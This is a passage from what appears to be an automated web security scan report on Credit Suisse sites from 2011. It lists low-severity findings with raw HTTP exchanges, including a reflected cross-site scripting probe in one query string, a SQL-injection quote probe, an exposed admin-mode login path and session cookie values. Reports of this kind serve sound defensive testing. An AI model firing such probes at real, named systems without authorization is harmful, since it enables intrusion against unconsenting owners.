<title>EMAGAZINE [ ADMIN MODE ]</title>
<link rel="STYLESHEET" type="text/css" href="https://admin.emagazine.
...[SNIP]...

9.28. https://responsibility.credit-suisse.com/app/_control/act_login_adminmode.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/_control/act_login_adminmode.cfm

Request

GET /app/_control/act_login_adminmode.cfm?lang=EN&client=&doid= HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:37:30 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:37:30 GMT
expires: Mon, 19 Sep 2011 15:37:30 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- OMNITURE ON//-->


<!-- SiteCatalyst code version: H.22.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

...[SNIP]...

9.29. https://responsibility.credit-suisse.com/app/_gen/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/_gen/

Request

GET /app/_gen/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:33:20 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:20 GMT
expires: Mon, 19 Sep 2011 15:33:20 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8

<script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<script type="text/javascript">/* <![CDATA[ */
   if (wind
...[SNIP]...

9.30. https://responsibility.credit-suisse.com/app/_gen/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/_gen/index.cfm

Request

GET /app/_gen/index.cfm HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:47:23 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:47:23 GMT
expires: Mon, 19 Sep 2011 15:47:23 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8

<script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<script type="text/javascript">/* <![CDATA[ */
   if (wind
...[SNIP]...

9.31. https://responsibility.credit-suisse.com/app/article/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/article/index.cfm

Request

GET /app/article/index.cfm?fuseaction=OpenArticle&aoid=319249&coid=64291&lang=EN HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://www.credit-suisse.com/us/en/
Cookie: CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:33:21 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:21 GMT
expires: Mon, 19 Sep 2011 15:33:21 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...

9.32. https://responsibility.credit-suisse.com/app/article/index3.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/article/index3.cfm

Request

GET /app/article/index3.cfm HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:37:08 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:37:08 GMT
expires: Mon, 19 Sep 2011 15:37:08 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


   <script language="JavaScript" type="text/javascript">
   <!--
       if(window.opener == undefined){
           location.href = "https://infocus.credit-suisse.com";
       }else{
           window.close();
       }
   //-->

...[SNIP]...

9.33. https://responsibility.credit-suisse.com/app/print/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/print/

Request

GET /app/print/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:33:20 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:21 GMT
expires: Mon, 19 Sep 2011 15:33:21 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<link type='text/css' rel='stylesheet' href='/app/_css/FF.css'>

<div style="text-align:left; margin:15px;">
<img src="https://emagazine.credit-suisse.com/a
...[SNIP]...

9.34. https://responsibility.credit-suisse.com/app/print/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/print/index.cfm

Request

GET /app/print/index.cfm HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:37:37 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:37:37 GMT
expires: Mon, 19 Sep 2011 15:37:37 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<link type='text/css' rel='stylesheet' href='/app/_css/FF.css'>

<div style="text-align:left; margin:15px;">
<img src="https://emagazine.credit-suisse.com/a
...[SNIP]...

9.35. https://responsibility.credit-suisse.com/app/sendpage/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/sendpage/

Request

GET /app/sendpage/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:33:20 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:20 GMT
expires: Mon, 19 Sep 2011 15:33:20 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8

<style>


   table.cfdump_wddx,
   table.cfdump_xml,
   table.cfdump_struct,
   table.cfdump_varundefined,
   table.cfdump_array,
   table.cfdump_query,
   table.cfdump_cfc,
   table.cfdump_object,
   table.
...[SNIP]...

9.36. https://responsibility.credit-suisse.com/robots.txt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /robots.txt

Request

GET /robots.txt HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:33:19 GMT
Server: Apache
Last-Modified: Wed, 06 Jul 2011 09:24:57 GMT
ETag: "1000000026698-3fb-4a7632c869803"
Accept-Ranges: bytes
Content-Length: 1019
Connection: close
Content-Type: text/plain

# robots.txt zu http://emagazine.credit-suisse.com


User-agent: Ultraseek
Allow: /

User-agent: Credit_Suisse_Search_Engine
Allow: /

User-agent: Credit Suisse Search Engine
Allow: /

Use
...[SNIP]...

10. Multiple content types specified  previous  next
There are 9 instances of this issue:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


10.1. https://emagazine.credit-suisse.com/app/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://emagazine.credit-suisse.com
Path:   /app/home/

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /app/home/ HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:30 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:30 GMT
expires: Mon, 19 Sep 2011 15:46:30 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="DISTRIBUTION" content="Global" />
<meta http-equiv="Content-type" content="UTF-8" />
<meta name="Content-language" content="EN" />
...[SNIP]...

10.2. https://emagazine.credit-suisse.com/app/home/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://emagazine.credit-suisse.com
Path:   /app/home/index.cfm

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /app/home/index.cfm HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:29 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:29 GMT
expires: Mon, 19 Sep 2011 15:46:29 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="DISTRIBUTION" content="Global" />
<meta http-equiv="Content-type" content="UTF-8" />
<meta name="Content-language" content="EN" />
...[SNIP]...

10.3. https://infocus.credit-suisse.com/app/article/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /app/article/index.cfm?fuseaction=OpenArticle&aoid=318646&coid=118&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://www.credit-suisse.com/us/en/
Cookie: CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:34:35 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:34:35 GMT
expires: Mon, 19 Sep 2011 15:34:35 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="DISTRIBUTION" content="Global" />
<meta http-equiv="Content-type" content="UTF-8" />
<meta name="Content-language" content="EN" />
...[SNIP]...

10.4. https://infocus.credit-suisse.com/app/print/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/print/index.cfm

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /app/print/index.cfm?fuseaction=OpenTopic&coid=90&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:45 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
pragma: no-cache
Last-Modified: Mon, 19 Sep 2011 14:46:45 GMT
expires: {ts '2011-09-19 16:46:45'}
Content-Language: en-US
Cache-Control: no-cache, no-store, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="DISTRIBUTION" content="Global" />
<meta http-equiv="Content-type" content="UTF-8" />
<meta name="Content-language" content="EN" />
...[SNIP]...

10.5. https://infocus.credit-suisse.com/app/rss/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/rss/index.cfm

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /app/rss/index.cfm?fuseaction=OpenRSS&aoid=318646&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&aoid=318646&coid=118&lang=EN&bhjs=-1
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:38 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:38 GMT
expires: Mon, 19 Sep 2011 15:38:38 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="DISTRIBUTION" content="Global" />
<meta http-equiv="Content-type" content="UTF-8" />
<meta name="Content-language" content="EN" />
...[SNIP]...

10.6. https://infocus.credit-suisse.com/app/sendpage/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/sendpage/index.cfm

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /app/sendpage/index.cfm?fuseaction=OpenSendPage&aoid=318646&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&aoid=318646&coid=118&lang=EN&bhjs=-1
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:37 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:38 GMT
expires: Mon, 19 Sep 2011 15:38:38 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="DISTRIBUTION" content="Global" />
<meta http-equiv="Content-type" content="UTF-8" />
<meta name="Content-language" content="EN" />
...[SNIP]...

10.7. https://infocus.credit-suisse.com/app/shop/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/shop/index.cfm

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /app/shop/index.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:39:49 GMT
Server: Apache
Set-Cookie: CFID=38647286; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=9932378849fbeda01587b81cbfc3d766; HttpOnly;domain=.credit-suisse.com;Secure;path=/
expires: {ts '2011-09-19 16:39:49'}
Content-Language: en-US
cache-control: public, no-cache, no-store, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="DISTRIBUTION" content="Global" />
<meta http-equiv="Content-type" content="UTF-8" />
<meta name="Content-language" content="EN" />
...[SNIP]...

10.8. https://infocus.credit-suisse.com/app/topic/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/topic/index.cfm

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /app/topic/index.cfm?fuseaction=OpenTopic&coid=282917&lang=en HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:52 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:53 GMT
expires: Mon, 19 Sep 2011 15:46:53 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="DISTRIBUTION" content="Global" />
<meta http-equiv="Content-type" content="UTF-8" />
<meta name="Content-language" content="en" />
...[SNIP]...

10.9. https://responsibility.credit-suisse.com/app/article/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /app/article/index.cfm?fuseaction=OpenArticle&aoid=319249&coid=64291&lang=EN HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://www.credit-suisse.com/us/en/
Cookie: CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:33:21 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:21 GMT
expires: Mon, 19 Sep 2011 15:33:21 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="DISTRIBUTION" content="Global" />
<meta http-equiv="Content-type" content="UTF-8" />
<meta name="Content-language" content="EN" />
...[SNIP]...

11. HTML does not specify charset  previous  next
There are 3 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


11.1. https://emagazine.credit-suisse.com/app/home/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://emagazine.credit-suisse.com
Path:   /app/home/index.cfm

Request

GET /app/home/index.cfm?8cac8%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ea9cebca0244=1 HTTP/1.1
Host: emagazine.credit-suisse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1
Accept: */*
Referer: https://emagazine.credit-suisse.com/app/home/index.cfm?8cac8%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ea9cebca0244=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CsgBasePath=/us/; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482677424:ss=1316482406749; CFID=38647896; CFTOKEN=27231980; bhCookieSess=1; bhCookiePerm=1

Response

HTTP/1.1 200 OK
Date: Mon, 19 Sep 2011 14:56:38 GMT
Server: Apache
Set-Cookie: CFID=38647896; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=27231980; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: bhCookieSess=1;path=/
Set-Cookie: bhCookiePerm=1;expires=Wed, 21-Sep-2011 14:56:38 GMT;path=/
Pragma: no-cache
Last-Modified: Mon, 19 Sep 2011 14:56:38 GMT
expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 32002

<HTML><HEAD>
<!-- These scripts are provided under the terms of the BrowserHawk license
agreement and may not be copied or used otherwise. [10.0.1.1 Enterprise; BDD ver 10.00]
See cyscape.com for d
...[SNIP]...

11.2. https://infocus.credit-suisse.com/app/_gen/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/_gen/index.cfm

Request

GET /app/_gen/index.cfm?cmd=display&folder=%27 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:39:22 GMT
Server: Apache
Set-Cookie: CFID=38647283; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=52167621; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: bhCookieSess=1;path=/
Set-Cookie: bhCookiePerm=1;expires=Wed, 21-Sep-2011 14:39:23 GMT;path=/
Pragma: no-cache
Last-Modified: Mon, 19 Sep 2011 14:39:22 GMT
expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html

<HTML xmlns:BHAWK><HEAD><STYLE>@media all { BHAWK\:clientCaps {behavior:url(#default#clientcaps)} }</STYLE>
<!-- These scripts are provided under the terms of the BrowserHawk license
agreement and m
...[SNIP]...

11.3. https://infocus.credit-suisse.com/jamez_customtags/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /jamez_customtags/

Request

GET /jamez_customtags/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:47 GMT
Server: Apache
